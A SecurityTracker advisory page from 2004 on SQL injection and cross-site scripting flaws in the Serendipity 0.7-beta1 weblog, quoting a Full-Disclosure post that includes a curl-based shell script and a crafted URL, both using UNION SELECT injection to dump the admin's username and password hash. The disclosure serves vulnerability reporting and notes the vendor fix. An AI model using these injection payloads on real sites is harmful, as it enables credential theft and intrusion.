SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   Serendipity Vendors:   s9y.org
Serendipity Input Validation Errors Let Remote Users Inject SQL Commands
SecurityTracker Alert ID:  1011448
SecurityTracker URL:  http://securitytracker.com/id/1011448
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Updated:  Oct 21 2004
Original Entry Date:  Sep 29 2004
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 0.7-beta1 and prior versions
Description:   An input validation vulnerability was reported in Serendipity. A remote user can inject SQL commands and can also conduct cross-site scripting attacks.

aCiDBiTS reported that 'exit.php' and 'comment.php' do not properly validate user-supplied input in the 'entry_id' parameter. A remote user can supply a specially crafted parameter value to inject SQL commands to be executed by the underlying database.

A demonstration exploit URL is provided:

http://URL_to_Serendipity_Weblog/comment.php?serendipity[type]=trackbacks
&serendipity[entry_id]=0%20and%200%20union%20select%201,2,3,4,username,password,
7,8,9,0,1,2,3%20from%20serendipity_authors%20where%20authorid=1%20/*

It is also reported that the 'email' and 'username' fields in 'comment.php' are not properly validated. A remote user can submit specially crafted input that, when viewed by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the Serendipity software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

The vendor was notified on September 13, 2004.

Impact:   A remote user can execute SQL commands on the underlying database. This can be exploited to view hashed password values.

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the Serendipity software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Solution:   The vendor has released a fixed version (0.7-beta3), available at:

http://www.s9y.org/12.html

Vendor URL:  www.s9y.org/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [Full-Disclosure] Serendipity 0.7-beta1 SQL Injection PoC


Serendipity 0.7-beta1   SQL Injection   Proof of Concept
By aCiDBiTS    acidbits@gmail.com      13-September-2004

	
"Serendipity (http://www.s9y.org/) is a weblog/blog system,
implemented with PHP. It is standards compliant, feature rich and open
source (BSD License)."
	
There is no user input sanitation for parameters entry_id in exit.php
and comment.php prior being used in a SQL query. This can be exploited
to manipulate SQL queries by injecting arbitrary SQL code. Comment.php
is also prone to XSS through email and username post's fields.
Serendipity 0.7-beta1 and older versions are vulnerable.

Developer team had been notified 13-September-2004 and this
vulnerabilities are fixed from Serendipity 0.7-beta3.
	
These PoCs dumps admin's username and md5(password).



Proof of Concept 1
------------------

Usage: ./ser_sqli_poc.sh URL_to_Serendipity_Weblog

ser_sqli_poc.sh
---------8<-----------8<-------------
#!/bin/sh

echo -n "Username:      "
curl -I -s "$1/exit.php?url_id=1&entry_id=1%20and%200%20union%20select%20username%20from%20serendipity_authors%20where%20authorid%3D1"
| grep Location | cut -b10-
echo -n "MD5(password): "
curl -I -s "$1/exit.php?url_id=1&entry_id=1%20and%200%20union%20select%20password%20from%20serendipity_authors%20where%20authorid%3D1"
| grep Location | cut -b10-
---------8<-----------8<-------------



Proof of Concept 2
------------------

Copy&Paste this to your browser and edit URL_to_Serendipity_Weblog.

http://URL_to_Serendipity_Weblog/comment.php?serendipity[type]=trackbacks&serendipity[entry_id]=0%20and%200%20union%20select%201,2,3,4,username,password,7,8,9,0,1,2,3%20from%20serendipity_authors%20where%20authorid=1%20/*




     \    / 
      (Oo) 
     //||\\

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC